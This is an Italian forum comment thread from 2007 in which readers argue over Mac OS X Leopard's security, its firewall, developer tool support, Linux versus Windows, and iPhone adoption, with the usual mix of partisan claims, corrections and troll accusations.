        Non sarai mica Nome e Cognome?Molti si chiedono se sei certo di sapere ciò che scrivi.Non sarai tipo Riotta come nel servizio sul New York Times e Beppe Grillo del TG1 di qualche giorno fa?
    • saxpax scrive:
      Re: x saxpaxtrollax
      se vuoi leggi anche questo:http://business.webnews.it/news/leggi/7396/osx-supera-windows-243-bug-a-44/devi accettare la relata.
      • logicaMente scrive:
        Re: x saxpaxtrollax
        - Scritto da: saxpax
        se vuoi leggi anche questo:
        http://business.webnews.it/news/leggi/7396/osx-sup
        devi accettare la relata.Scusa ma... l'ho letto e si rifa ancora al solito blog zdnet che ha preso i dati a cappella da secunia... è sempre la stessa fonte.Puoi leggere le spiegazioni date ieri ed oggi a quel blog, magari fare una visitina alle *fonti* originali invece che a roba rimasticata n-volte?Magari un commento su quelle sarebbe interessante.Ciao.
  • Mah! scrive:
    Proprio a posto non è
    ... visti i frequenti kernel panic (per i maccari non pratici: schermo grigio, splash screen in varie lingue che ti impone di riavviare) provocati da un certo "mbuf address out of range" nel modulo "com.apple.iokit.AppleAirPort2" sul mio PowerBook, non mi pare che sia stata messa una pezza ai problemi fondamentali.
    • PLONK_THIS scrive:
      Re: Proprio a posto non è
      - Scritto da: Mah!
      ... visti i frequenti kernel panic (per i maccari
      non pratici: schermo grigio, splash screen in
      varie lingue che ti impone di riavviare)
      provocati da un certo "mbuf address out of range"
      nel modulo "com.apple.iokit.AppleAirPort2" sul
      mio PowerBook, non mi pare che sia stata messa
      una pezza ai problemi
      fondamentali.se è un problema solo tuo, dubito si possa considerarlo fondamentale :-Dhai provato a mandare un feedback a chi di dovere? le sterili polemiche su PI non aiutano molto
    • anonimo01 scrive:
      Re: Proprio a posto non è
      - Scritto da: Mah!
      ... visti i frequenti kernel panic (per i maccari
      non pratici: schermo grigio, splash screen in
      varie lingue che ti impone di riavviare)
      provocati da un certo "mbuf address out of range"
      nel modulo "com.apple.iokit.AppleAirPort2" sul
      mio PowerBook, non mi pare che sia stata messa
      una pezza ai problemi
      fondamentali.???mai visto/sentito (ad oggi)mandagli un feedback, di solito rispondono e dopo un po' rilasciano la patch.
      • PLONK_THIS scrive:
        Re: Proprio a posto non è
        - Scritto da: anonimo01
        - Scritto da: Mah!

        ... visti i frequenti kernel panic (per i
        maccari

        non pratici: schermo grigio, splash screen in

        varie lingue che ti impone di riavviare)

        provocati da un certo "mbuf address out of
        range"

        nel modulo "com.apple.iokit.AppleAirPort2" sul

        mio PowerBook, non mi pare che sia stata messa

        una pezza ai problemi

        fondamentali.


        ???mai visto/sentito (ad oggi)
        mandagli un feedback, di solito rispondono e dopo
        un po' rilasciano la
        patch.bastava usasse google http://docs.info.apple.com/article.html?artnum=303712
        • anonimo01 scrive:
          Re: Proprio a posto non è

          bastava usasse google

          http://docs.info.apple.com/article.html?artnum=303ecco tho.ed io che perdo tempo a rispondergli...che noob--edit--che super n00b! leopard con quell'errore non c'entra nulla! "To resolve this situation, download and install Mac OS X 10.4.8. You can use the Software Update feature of System Preferences, or download the Update from Apple Software Downloads (http://www.apple.com/support/downloads/)." amico, se non aggiorni la baracca è inutile lamentarsi se ti crolla in testa!almeno gli update!bah-----------------------------------------------------------Modificato dall' autore il 20 dicembre 2007 11.33----------------------------------------------------------------------------------------------------------------------Modificato dall' autore il 20 dicembre 2007 11.34-----------------------------------------------------------
    • alexjenn scrive:
      Re: Proprio a posto non è
      da come parli e dal problema che hai, sembra che tu stia usando Tiger.Scusa, ho visto adesso il post di PLONK_THIS-----------------------------------------------------------Modificato dall' autore il 20 dicembre 2007 16.48-----------------------------------------------------------
  • Pietro scrive:
    Vista incomincia a essere più veloce
    il grosso problema per vista come è noto è la velocità che ad ora risulta di parecchio inferiore a XP.Comunque qualcosa i comincia a muoversi, acquistando un computer dedicato anche vista finalmente diventa un pò più veloce.http://www.lastampa.it/_web/cmstp/tmplrubriche/giornalisti/grubrica.asp?ID_blog=31&ID_articolo=110&ID_sezione=39&sezione=
  • Luigi Villa scrive:
    Delusioni maculate
    Da ani uso Mac e compagnia cantando, devo dire che mi sono sempre trovato bene... fino ad ora.Ho da poco acquistato un bellissimo e velocissimo Macbook con il nuovo sistema operativo e dopo un paio di giorni di "smanettamenti" mi sono cascate le braccia.1. Il firewall non permette di controllare il traffico sulle singole porte ma si limita a dare accesso alle applicazioni, per avere un firewall come si deve l'ho disattivato e mi sono fatto un bello script per ipfw a "manina";2. La tecnologia webobjects, che era una delle perle di Apple, e sparita insieme a tutti gli strumenti di sviluppo correlati;3. Di Java 6 non se ne parla, se si vuole installarlo non c'è una distribuzione ufficiale di Apple;4. Non è possibile installare Tiger sul portatile, infatti ho provato a fare un downgrade (mi serviva webobjects) e mi ha dato un bel due di picche;Per il resto non mi posso lamentare, il portatile è letteralmente una scheggia, ma mi pare che anche solo questi difettucci (più altri riscontrati nelle gestione delle font che non vi sto a spiegare) , per uno che sviluppa, siano importanti.
    • PLONK_THIS scrive:
      Re: Delusioni maculate
      -
      1. Il firewall non permette di controllare il
      traffico sulle singole porte ma si limita a dare
      accesso alle applicazioni, per avere un firewall
      come si deve l'ho disattivato e mi sono fatto un
      bello script per ipfw a
      "manina";hai ragione, ma non è un'esigenza di qualsivoglia utente non smanettone.usa intego se proprio hai queste necessità, è semplice e permette il controllo in entrata ed in uscita.
      2. La tecnologia webobjects, che era una delle
      perle di Apple, e sparita insieme a tutti gli
      strumenti di sviluppo
      correlati;bah google può essere utile a volte per scoprire cose interessantihttp://forums.macosxhints.com/archive/index.php/t-81107.htmlnon ho sottomano il dvd di leopard, ma se tu l'hai prova a controllare se è vero quando indicato nel link
      3. Di Java 6 non se ne parla, se si vuole
      installarlo non c'è una distribuzione ufficiale
      di
      Apple;è uscito da poco leopard ma già qualcosa c'è, anche se non ufficiale, c'è ed era una news del mese scorsohttp://punto-informatico.it/p.aspx?i=2127792
      4. Non è possibile installare Tiger sul
      portatile, infatti ho provato a fare un downgrade
      (mi serviva webobjects) e mi ha dato un bel due
      di
      picche;indicaci che versione di Tiger (PPC o Universal) vuoi installare su quale tipo di portatile, poi magari una soluzione la si trovacerto che se vuoi installare Tiger PPC su un portatile con intel...
      Per il resto non mi posso lamentare, il portatile
      è letteralmente una scheggia, ma mi pare che
      anche solo questi difettucci (più altri
      riscontrati nelle gestione delle font che non vi
      sto a spiegare) , per uno che sviluppa, siano
      importanti.
      • alexjenn scrive:
        Re: Delusioni maculate
        PAZZO.NON USARE INTEGO.
      • Luigi Villa scrive:
        Re: Delusioni maculate
        Per Bacco! :)Grazie per i consigli, li trovo ottimi.Inoltre non avevo minimamente pensato al fatto che il MacBook è Intel mentre la versione che ho di Tiger è per PowerPC :)Si può ancora sviluppare Webobjects con WOLips, il problema è che hanno piallato il Java/Cocoa bridge e quindi se hai un'applicazione Direct To Java Client non c'è verso di farla partire.Mi sono dannato a cercare di fare il porting ma ho desistito e sto passando a J2EE.Grazie ancora.P.S.: Leopard resta comunque un gioiellino pur con qualche difettuccio da limare.
    • Mah! scrive:
      Re: Delusioni maculate
      Di Java 6 è appena uscita una distribuzione chiamata Java 6 developer preview 8, la trovi su http://developer.apple.com, basta registrarsi.
    • Stefano scrive:
      Re: Delusioni maculate
      - Scritto da: Luigi Villa
      2. La tecnologia webobjects, che era una delle
      perle di Apple, e sparita insieme a tutti gli
      strumenti di sviluppo
      correlati;Strano... io webobject l'ho installato su leopard!Guardato bene?
    • anonimo01 scrive:
      Re: Delusioni maculate

      1. Il firewall non permette di controllare il
      traffico sulle singole porte ma si limita a dare
      accesso alle applicazioni, per avere un firewall
      come si deve l'ho disattivato e mi sono fatto un
      bello script per ipfw a
      "manina";prova questo:http://www.hanynet.com/waterroof/è veramente da fantascienza, sembra di configurare un router da quanta robba c'ha!(apple)
    • FDG scrive:
      Re: Delusioni maculate
      - Scritto da: Luigi Villa
      1. Il firewall non permette di controllare il
      traffico sulle singole porte ma si limita a dare
      accesso alle applicazioni, per avere un firewall
      come si deve l'ho disattivato e mi sono fatto un
      bello script per ipfw a "manina";Ora ti spiego. Se scarico un troian e questo apre una connessione sulla porta 80 per inviare ad un sito remoto i tuoi dati personali, le tue regole su ipfw come fanno a bloccare questa connessione?Il concetto è che ti fidi del codice, non delle porte aperte o chiuse. E piuttosto che chiudere in ingresso una porta di un servizio meglio spegnere il servizio. Tanto, a che ti serve tenere su il servizio se poi non lo puoi usare? E se hai esigenze particolari va bene la configurazione a mano di ipfw (o ti scarichi brickhouse). Mentre per l'utente comune l'approccio per applicazione è più comprensibile.Io, visto che collego sempre il computer dietro nat, ho disabilitato il firewall.
      2. La tecnologia webobjects, che era una delle
      perle di Apple, e sparita insieme a tutti gli
      strumenti di sviluppocorrelati;Perché non interessa più. Nel mercato degli application server ha una rilevanza praticamente nulla.
      3. Di Java 6 non se ne parla, se si vuole
      installarlo non c'è una distribuzione ufficiale
      di Apple;Aspetto anche io. Ma al momento devo ammettere che non ho trovato motivo per sentirne la mancanza. Nel mio lavoro il requisito è Java 1.5. Della 1.6 ancora non si parla. Quindi per il momento questa mancanza non è un problema.
  • frank hillary scrive:
    MacOS, Unix VIRUS FREE
    Il MacOS X Leopard, come i suoi predecessori felini a loro tempo, e' il sistema UNIX piu' avanzato e performante al mondo, a detta dell' USENIX, la convention mondiale dei sistemi *nix. Curiosamente e' anche la distribuzione Unix Open Source piu' usata al mondo.Tra i suoi fratelli LINUX e BSD si pone al pari come sistema operativo praticamente VIRUS FREE, MALWARE FREE, SPYWARE FREE e tutti gli utenti microsoft sanno a cosa ci si riferisce... al sogno fantastico e ricorrente di tutte le installazioni windows.Il sistema basato sull'*nix DarwinOS (un kernel derivato da BSD) e' Open Source, ed e' stato creato dagli stessi sviluppatori che all'universita' di Berkeley avevano in gioventu' sviluppato UNIX ed ora sono alle dipendenze di Steve J...Ricordiamo anche che MacosX naturalmente ha la compatibilita' binaria con FreeBSD, NetBSD, OpenBSD, e Linux. Ovviamente rispetto a questi sistemi puo' contare su un team di eccellenti sviluppatori, pagati, che lavorano 24hsu24 esclusivamente al perfezionamento e sviluppo, oltre che naturalmente ai preziosi contributi della comunita' opensource.
    • JJLetho scrive:
      Re: MacOS, Unix VIRUS FREE
      forse hai ragione ... ma io da anni, prima con xp ora con vista 64, non prendo virus ne trojian ne spyware ne malware ne rootkit con la semplice installazione di antivir e il firewall di windows.ovviamente è inutile buttare il discorso sul sistema più su sicuro se in fondo nn è quello il problema.il problema sta che windows ha un numero paurosamente maggiore di utenti "a rischio"e chi fa anche assistenze tecniche ai pc lo sa benissimo.esistono milioni di utenti clicca tutto accetta tutto e apri tutto, che, sommati alla propensione dei creatori di malware, spyware ecc.. di buttarsi su win (sopratutto per l'enorme base di installato) che rende ,ad un primo sguardo, il sistema certamente instabile a livello di sicurezza.Ovviamente oltre a questo la stabilità dei sistemi mac deriva anche dalla rigidità dell'hardware, il pc windows è un sistema aperto con tutti i vantaggi e gli svantaggi.a mio avviso un utilizzatore attento, senza essere un genio dell'informatica, non ha problemi su win macos e linux e li può usare per le proprie necessità senza blocchi ideologici inutili.
      • lellykelly scrive:
        Re: MacOS, Unix VIRUS FREE
        dai che qualcuno sano esiste ancora
      • alexjenn scrive:
        Re: MacOS, Unix VIRUS FREE
        Puoi anche non prendere virus con le tue macchine Windows, ma a quale prezzo? L'hai scritto tu: antivirus, firewalls, ecc. Ergo, spese e costi di software.Vuoi metterci poi la spesa per l'hardware, dato che questi software succhiano risorse e potenza?E poi, vuoi metterci la libertà di cliccare, aprire, andare dove ti pare su Internet e non beccare manco uno, dico un solo virus?Senza paranoie, senza preoccupazioni...Chi ti ripaga di tutto questo?
        • JJLetho scrive:
          Re: MacOS, Unix VIRUS FREE
          io non la metterei sul piano che dici tuantivir è gratis e il firewall è integratoinstallazione 3 minuti per antivir in quanto a stare attenti... è ovvio che se sviluppano il malware per win con mac si sta tranquilli , è anche vero, per esempio, che se cerco un programma per disegnare icone (la prima cosa che mi viene in mente) per win ne trovo 100 di cui 30 freeware, 50 shareware o trial e 20 a pagamento e per mac ne trovo 2.bisogna sempre ponderare le proprio scelte in base alle esigenze.per alcuni anche il gioco della disney che non gira o gira a scatti è un grosso problema se hai un bimbo piccolo che ci vuole giocare
          • alexjenn scrive:
            Re: MacOS, Unix VIRUS FREE
            caro amico,c'è più open nel mondo mac.pondera bene anche ciò che affermi.
          • JJLetho scrive:
            Re: MacOS, Unix VIRUS FREE
            ma guarda che freeware non significa opennemmeno sharewareponderando e parlando dopo aver ponderatose poi vuoi dirmi che c'è più scelta di software per mac che per win vuol dire che viviamo in due universi paralleli
          • PLONK_THIS scrive:
            Re: MacOS, Unix VIRUS FREE
            - Scritto da: JJLetho
            ma guarda che freeware non significa open
            nemmeno shareware

            ponderando e parlando dopo aver ponderato

            se poi vuoi dirmi che c'è più scelta di software
            per mac che per win vuol dire che viviamo in due
            universi
            parallelise per sport li testi tutti senza poi usarne veramente uno hai ragione..ma anche una scelta tra poche decine di buoni sw basta e avanzahttp://interfacelift.com/icons-mac/software.phpsuvvia che qualche decina li trovi anche qui per OS Xhttp://www.versiontracker.com/php/qs.php?mode=basic&action=search&str=icon&srchArea=macosx&submit=Goin fondo pur avendo la scelta di tanti editori testo, poi tutti usano word
    • Epimenide scrive:
      Re: MacOS, Unix VIRUS FREE
      - Scritto da: frank hillary
      Ricordiamo anche che MacosX naturalmente ha la
      compatibilita' binaria con FreeBSD, NetBSD,
      OpenBSD, e Linux.Hmmm... l'ultima volta che ho controllato, OS X usa il formato Mach-O, Linux e i vari *BSD invece l'ELFhttp://macslash.org/article.pl?sid=07/02/24/0114221
  • saxpax scrive:
    Linux è l'unica alternativa a Windows.
    Linux rimane l'unica alternativa valida a Windows,come si possono spendere tanti soldi per Mac OS X, che è vulnerabile 365 giorni l anno, almeno Linux è gratis, ed ha sempre meno vulnerabilità rispetto a Mac OS X, ma il dato più preoccupante è che è più vulnerabile di Vista e XP insieme, se Apple ha tutti questi problemi anche se ha solo il 5% di diffusione mondiale, se crescono ancora cosa fanno chiudono i battenti, qui non si tratta di problemi risolvibili con un antivirus, ma di veri è propi errore di programmazione, c'è un rischio altissimo di possibili accessi remoti, vi rendete conto, per non parlare di Leopard, come hann fatto a dimenticare di patchare le falle scoperte su Tiger, di riportarle su Leopard, poi con questo firewall, che prima non funzionava di default, adesso è incompatibile, cme si può usare Mac OS X Leopard, con 234 vulnerabilità Total highly critical senza un firewall che funzioni, è da pazzi, salta fuori una vulnerbilità Total highly critical al giorno, mah....
    • dio scrive:
      Re: Linux è l'unica alternativa a Windows.
      w la punteggiatura
    • Daniele Carotenuto scrive:
      Re: Linux è l'unica alternativa a Windows.
      Ma tu ci fai grafica su linux?Direi che al limite "un'alternativa" economica al mac è windows... ma da prendere con le dovute pinze...Ancora oggi il mac è quello che di meglio c'è per fare determinati lavori...quindi basta con ste menate del meglio uno o meglio l'altro
      • LaNberto scrive:
        Re: Linux è l'unica alternativa a Windows.
        non c'è una sola frase di questo post che non sia questionabile, disinformata quando non apertamente falsa.ignoranza o malafede?
      • The_GEZ scrive:
        Re: Linux è l'unica alternativa a Windows.
        Ciao Daniele Carotenuto !
        Ma tu ci fai grafica su linux?Vabbè dai, la gente che "fa grafica" c'è anche su linux ..http://www.tuxjournal.net/?p=402
        Ancora oggi il mac è quello che di meglio c'è per
        fare determinati
        lavori...Quali ?
    • zeppolo scrive:
      Re: Linux è l'unica alternativa a Windows.
      confessasteve jobs ti ha rubato la palla quando eri piccolo? poi è arrivato linus e ti ha difeso?
    • Guglielmo scrive:
      Re: Linux è l'unica alternativa a Windows.
      Ma che cosa stai dicendo?!?Forse ti sfugge che OSX è basato su FreeBSD 5 ? Errori di programmazione ? E chi non ne ha ? Non ne ha Linux ? Ma farmi il piacere.Documentati per favore.
      • pippo santoanast aso scrive:
        Re: Linux è l'unica alternativa a Windows.
        - Scritto da: Guglielmo
        Ma che cosa stai dicendo?!?
        Forse ti sfugge che OSX è basato su FreeBSD 5 ?
        Errori di programmazione ? E chi non ne ha ?
        Non ne ha Linux ? Ma farmi il piacere.
        Documentati per favore.Si possono prendere ottimi sistemi operativi e danneggiarli irreparabilmente.
        • PLONK_THIS scrive:
          Re: Linux è l'unica alternativa a Windows.
          - Scritto da: pippo santoanast aso
          - Scritto da: Guglielmo

          Ma che cosa stai dicendo?!?

          Forse ti sfugge che OSX è basato su FreeBSD 5 ?

          Errori di programmazione ? E chi non ne ha ?

          Non ne ha Linux ? Ma farmi il piacere.

          Documentati per favore.

          Si possono prendere ottimi sistemi operativi e
          danneggiarli
          irreparabilmente.ad esempio?e sai anche dirci nella fattispecie dove sarebbero questi errori/orrori?
    • pPietro scrive:
      Re: Linux è l'unica alternativa a Windows.
      - Scritto da: saxpax
      Linux rimane l'unica alternativa valida a
      Windows,come si possono spendere tanti soldi per
      Mac OS X, che è vulnerabile 365 giorni l anno,
      almeno Linux è gratis, ed ha sempre meno
      vulnerabilità rispetto a Mac OS X, ma il dato più
      preoccupante è che è più vulnerabile di Vista e
      XP insieme, se Apple ha tutti questi problemi
      anche se ha solo il 5% di diffusione mondiale, se
      crescono ancora cosa fanno chiudono i battenti,
      qui non si tratta di problemi risolvibili con un
      antivirus, ma di veri è propi errore di
      programmazione, c'è un rischio altissimo di
      possibili accessi remoti, vi rendete conto, per
      non parlare di Leopard, come hann fatto a
      dimenticare di patchare le falle scoperte su
      Tiger, di riportarle su Leopard, poi con questo
      firewall, che prima non funzionava di default,
      adesso è incompatibile, cme si può usare Mac OS X
      Leopard, con 234 vulnerabilità Total highly
      critical senza un firewall che funzioni, è da
      pazzi, salta fuori una vulnerbilità Total highly
      critical al giorno,
      mah....E' incredibile che con tutte queste vulnerabilità non sia mai apparso un virus, un trojan etc. niente. Eppure da quanto dici dovrebbe essere facile, e il primo che ci riesce meriterebbe gli allori delle cronache mondiali, la notizia farebbe il giro del mondo in pochi minuti, tutti i giornali ne parlerebbero perchè Mac OS ad oggi risulta essere l'OS più sicuro.Chissà perchè?mah..
      • AcidoPerMel a scrive:
        Re: Linux è l'unica alternativa a Windows.
        - Scritto da: pPietro
        ....
        E' incredibile che con tutte queste vulnerabilità
        non sia mai apparso un virus, un trojan etc.
        niente. Eppure da quanto dici dovrebbe essere
        facile, e il primo che ci riesce meriterebbe gli
        allori delle cronache mondiali, la notizia
        farebbe il giro del mondo in pochi minuti, tutti
        i giornali ne parlerebbero perchè Mac OS ad oggi
        risulta essere l'OS più
        sicuro.
        Chissà perchè?
        mah..Forse perchè il gioco non vale la candela??Ha più senso farlo per linux (e ancora non ne esistono).Siete l'ultimo dei sistemi operativi per installazione...
        • PLONK_THIS scrive:
          Re: Linux è l'unica alternativa a Windows.
          - Scritto da: AcidoPerMel a
          - Scritto da: pPietro

          ....

          E' incredibile che con tutte queste
          vulnerabilità

          non sia mai apparso un virus, un trojan etc.

          niente. Eppure da quanto dici dovrebbe essere

          facile, e il primo che ci riesce meriterebbe gli

          allori delle cronache mondiali, la notizia

          farebbe il giro del mondo in pochi minuti, tutti

          i giornali ne parlerebbero perchè Mac OS ad oggi

          risulta essere l'OS più

          sicuro.

          Chissà perchè?

          mah..

          Forse perchè il gioco non vale la candela??
          tipo le migliaia di $$$$$ messi a concorso per bucare un mac?http://macdailynews.com/index.php/weblog/comments/mac_os_x_virus_prize_2005_offers_25000_cash_prize/tipo la notorietà di essere il primo ad esserci riuscito?suvvia di che stiamo cianciando?
          Ha più senso farlo per linux (e ancora non ne
          esistono).
          e quale sarebbe la differenza?
          Siete l'ultimo dei sistemi operativi per
          installazione...quid?ti rendi conto che stai per essere classificato tra i "troll" ?
        • russian pirate scrive:
          Re: Linux è l'unica alternativa a Windows.
          - Scritto da: AcidoPerMel a
          Siete l'ultimo dei sistemi operativi per
          installazione...Falso. Linux è dietro a Mac, e di tanto.E' vero, Linux viene installato tante volte. Ma non è che un utente che installa 10 distribuzioni per provarle tutte, conta per 10 eh...
      • saxpax scrive:
        Re: Linux è l'unica alternativa a Windows.
        con tutte quelle vulnerabilità non servono i virus, hai mai sentito parlate di ottenene l'accesso remoto, con tutte quelle vulnerabilità, è senza un firewall che funzioni, Mac OS X è una porta aperta per hacker & cracker.
        • Pietro scrive:
          Re: Linux è l'unica alternativa a Windows.
          - Scritto da: saxpax
          con tutte quelle vulnerabilità non servono i
          virus, hai mai sentito parlate di ottenene
          l'accesso remoto, con tutte quelle vulnerabilità,
          è senza un firewall che funzioni, Mac OS X è una
          porta aperta per hacker &
          cracker.vai quihttp://security.symantec.com/sscv6/default.asp?langid=ie&venid=sym e controlla la situazione del tuo sistema. Il mio mac risulta completamente sigillato.P.S. il firewall del mac funziona perfettamente ed è incluso nel sistema
    • Alessandro C. scrive:
      Re: Linux è l'unica alternativa a Windows.
      - Scritto da: saxpax
      Linux rimane l'unica alternativa valida a
      Windows,come si possono spendere tanti soldi per
      Mac OS X, che è vulnerabile 365 giorni l anno,
      almeno Linux è gratis, ed ha sempre meno
      vulnerabilità rispetto a Mac OS X, ma il dato più
      preoccupante è che è più vulnerabile di Vista e
      XP insieme, se Apple ha tutti questi problemi
      anche se ha solo il 5% di diffusione mondiale, se
      crescono ancora cosa fanno chiudono i battenti,
      qui non si tratta di problemi risolvibili con un
      antivirus, ma di veri è propi errore di
      programmazione, c'è un rischio altissimo di
      possibili accessi remoti, vi rendete conto, per
      non parlare di Leopard, come hann fatto a
      dimenticare di patchare le falle scoperte su
      Tiger, di riportarle su Leopard, poi con questo
      firewall, che prima non funzionava di default,
      adesso è incompatibile, cme si può usare Mac OS X
      Leopard, con 234 vulnerabilità Total highly
      critical senza un firewall che funzioni, è da
      pazzi, salta fuori una vulnerbilità Total highly
      critical al giorno,
      mah....Adoro i Troll:-)
    • PLONK_THIS scrive:
      Re: Linux è l'unica alternativa a Windows.
      ci commenti anche questi dati per una volta senza svicolare come stai facendo da un paio di giorni?http://secunia.com/graph/?type=adv&period=all&prod...http://secunia.com/graph/?type=adv&period=all&prod...http://secunia.com/graph/?type=adv&period=2007&pro...forza non glissare anche stavolta trolletto
    • pentolino scrive:
      Re: Linux è l'unica alternativa a Windows.
      compimenti saxpax, vedo che il livello delle trollate sta salendo! vai così che sei il mio mito!(troll)
    • Pel scrive:
      Re: Linux è l'unica alternativa a Windows.
      - Scritto da: saxpax
      Linux rimane l'unica alternativa valida a
      Windows,come si possono spendere tanti soldi per
      Mac OS X, che è vulnerabile 365 giorni l anno,

      qui non si tratta di problemi risolvibili con un
      antivirus, ma di veri è propi errore di
      programmazione, c'è un rischio altissimo di
      possibili accessi remoti, vi rendete conto, per
      non parlare di Leopard, come hann fatto a
      dimenticare di patchare le falle scoperte su
      Tiger, di riportarle su Leopard, poi con questo
      firewall, che prima non funzionava di default,
      adesso è incompatibile, cme si può usare Mac OS X
      Leopard, con 234 vulnerabilità Total highly
      critical senza un firewall che funzioni, è da
      pazzi, salta fuori una vulnerbilità Total highly
      critical al giorno,
      mah....mah... secondo me i casi sono due, o ti hanno fatto il lavaggio del cervello o non sai di cosa stai parlando. o tutte e due le cose.Giusto per chiarire: i miei mac sono agganciati a Internet 24 ore al giorno per mesi consecutivi (per gli utenti Win: non stupitevi, le macchine Unix lo possono fare, è routine) e nessuno è mai riuscito a entrarci e a passare il firewall, né di Jaguar, né di Tiger, e né di Leopard, che uso dalle prime beta rese pubbliche (ovviamente su Leopard ho dovuto configurarlo, gli altri andavano già bene con la configurazione di default).Stesso discorso per le varie macchine Mac che usiamo per lavorare. Nessun problema di virus, trojan, adware, malware in genere. Vuoi una stima di quante perdite di dati e tempo abbiamo sofferto sui PC nello stesso periodo? Con tre, dico tre persone addette esclusivamente all'help desk, controllo della rete e gestione dei vari antivirus eccetera? Parliamo di qualche decina di episodi l'anno di perdite di dati su 30 PC Win XP2.Il dato di fatto è che a livello teorico nessun sistema è sicuro, ma a livello pratico OS X è quello in cui ci sono meno probabilità di avere problemi, perché ha MENO buchi degli altri. E personalmente il mio conteggio di rogne (intrusioni, virus, trojan, perdite di file dovute a problemi SW) è di ZERO su mac a casa e ZERO sui 15 mac in ufficio.Un caso solo non fa statistica, ma insomma...
      • saxpax scrive:
        Re: Linux è l'unica alternativa a Windows.
        coma faia dirlo hai mai fatto un penetretion test????
        • Epimenide scrive:
          Re: Linux è l'unica alternativa a Windows.
          - Scritto da: saxpax
          coma faia dirlo hai mai fatto un penetretion
          test????Dove lavoro non è una ditterella, e abbiamo un team specificamente dedicato ai penetration test sul software che produciamo: ti lascio indovinare quale è il sistema operativo che i componenti del team preferiscono avere installato sui loro laptop (ed è gente che va alle convention degli hacker per lavoro)...
          • anonimo01 scrive:
            Re: Linux è l'unica alternativa a Windows.
            - Scritto da: Epimenide
            - Scritto da: saxpax

            coma faia dirlo hai mai fatto un penetretion

            test????
            Dove lavoro non è una ditterella, e abbiamo un
            team specificamente dedicato ai penetration test
            sul software che produciamo: ti lascio indovinare
            quale è il sistema operativo che i componenti del
            team preferiscono avere installato sui loro
            laptop (ed è gente che va alle convention degli
            hacker per
            lavoro)...fammi indovinare....mmmm...uhhmmm...Vista! :D(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)
    • Mythos scrive:
      Re: Linux è l'unica alternativa a Windows.

      c'è un rischio altissimo di
      possibili accessi remoti, Ma vai a zappare la terra..
    • alexjenn scrive:
      Re: Linux è l'unica alternativa a Windows.
      Ma vatt'ampenne, compa'.
  • MeX scrive:
    niente NSA? :)
    bella li!ah e poi:"e iPhone negli USA se la cava abbastanza bene" se è solo "abbastanza bene" essere diventati in pochi mesi i più venduti dietro solo al Blackberry beh... allora diciamo "abbastanza bene" :)
    • lellykelly scrive:
      Re: niente NSA? :)
      per me le vendite dell'iphone ci sono solo sulla base che se non lo hai sei uno sfigato... come con gli ipod agli inizi.trovare uno che usi un iphone per dei validi motivi, secondo me, ancora non c'è.quando è uscito ho detto figata figata lo compro, poi passata l'eccitazione del momento ho valutato le caratteristiche e praticamente ha solo cose che non mi servono. prenderlo per mostrarlo come quelli che vanno in giro con la psp a farla vedere agli amici non serve.per uso professionale ci vorrà ancora un po.
      • MeX scrive:
        Re: niente NSA? :)
        - Scritto da: lellykelly
        per me le vendite dell'iphone ci sono solo sulla
        base che se non lo hai sei uno sfigato... come
        con gli ipod agli
        inizi.per te.
        trovare uno che usi un iphone per dei validi
        motivi, secondo me, ancora non
        c'è.hai ragione, ti credo!
        quando è uscito ho detto figata figata lo compro,
        poi passata l'eccitazione del momento ho valutato
        le caratteristiche e praticamente ha solo cose
        che non mi servono. prenderlo per mostrarlo come
        quelli che vanno in giro con la psp a farla
        vedere agli amici non
        serve.
        per uso professionale ci vorrà ancora un po.forse aiuta anche il fatto che in Italia non è in vendita? :)
        • lellykelly scrive:
          Re: niente NSA? :)
          volevo dire che il mercato del bb è diverso da quello del ip, il fatto che sia diffuso non vuol dire che lo sia perchè è il migliore, ma magari perchè è uno status simbol.il paragone con l'ipod l'ho fatto perchè prima tutti lo avevano perchè era una novità ed era cool, poi si sono accorti che si sentive ed andava anche bene. l'iphone al momento è, per me, un giocattolo che col tempo tirerà fuori tutte le cose buone.
          • MeX scrive:
            Re: niente NSA? :)
            quindi non ho capito cosa c'è di male nel saper vendere un prodotto che ha delle qualità e che infatti poi si afferma sul mercato per le sue qualità e non per l'effetto "moda"...
      • PLONK_THIS scrive:
        Re: niente NSA? :)
        per me è spocchioso credere che tutti siano idioti ed aquistino senza capire cosa acquistano, soprattutto oggi che i tempi non sono di vacche grasse.se oltre hai "per me" abbiamo dei dati certi su cui ragionare, bene, altrimenti meglio non perdere tempo su disquisizioni puramente opinabili.- Scritto da: lellykelly
        per me le vendite dell'iphone ci sono solo sulla
        base che se non lo hai sei uno sfigato... come
        con gli ipod agli
        inizi.
        trovare uno che usi un iphone per dei validi
        motivi, secondo me, ancora non
        c'è.
        quando è uscito ho detto figata figata lo compro,
        poi passata l'eccitazione del momento ho valutato
        le caratteristiche e praticamente ha solo cose
        che non mi servono. prenderlo per mostrarlo come
        quelli che vanno in giro con la psp a farla
        vedere agli amici non
        serve.
        per uso professionale ci vorrà ancora un po.
        • lellykelly scrive:
          Re: niente NSA? :)
          non credo che sia reato descrivere un punto di vista, o sua maestà non lo permette?
          • PLONK_THIS scrive:
            Re: niente NSA? :)
            - Scritto da: lellykelly
            non credo che sia reato descrivere un punto di
            vista, o sua maestà non lo
            permette?non credo sia reato definire discutibili e opinabili idee personali che non poggiano su dati concreti, o sua maestà non lo permette?se vuoi sostituire la democrazia con la dittatura, fallo a casa tua, qui non è luogo adatto.
      • Pel scrive:
        Re: niente NSA? :)
        - Scritto da: lellykelly
        trovare uno che usi un iphone per dei validi
        motivi, secondo me, ancora non
        c'è.ah sì? Allora ti sarà probabilmente sfuggita la notizia che nei rilevamenti di accesso a Internet, gli iPhone hanno superato di già LA SOMMA COMPLESSIVA DI TUTTI GLI SMARTPHONE WINDOWS. Cosa vuol dire? Semplice, che chi ha l'iPhone lo usa per andare sul Web, mentre chi haWindows Mobile non lo fa, per il semplice fatto che è IMPOSSIBILE leggere una pagina Web con quella schifezza di browser di Microsoft.Hai provato a navigare con iPhone (o con iPod Touch in Wi-fi, stesso browser)? No vero? Beh, io sì, e ti garantisco che non c'è paragone con nulla di preesistente.Leggi comodamente le pagine e gestisci la navigazione con due dita (già, è multitouch) e senza bisogno di studiare un manuale per farlo andare.
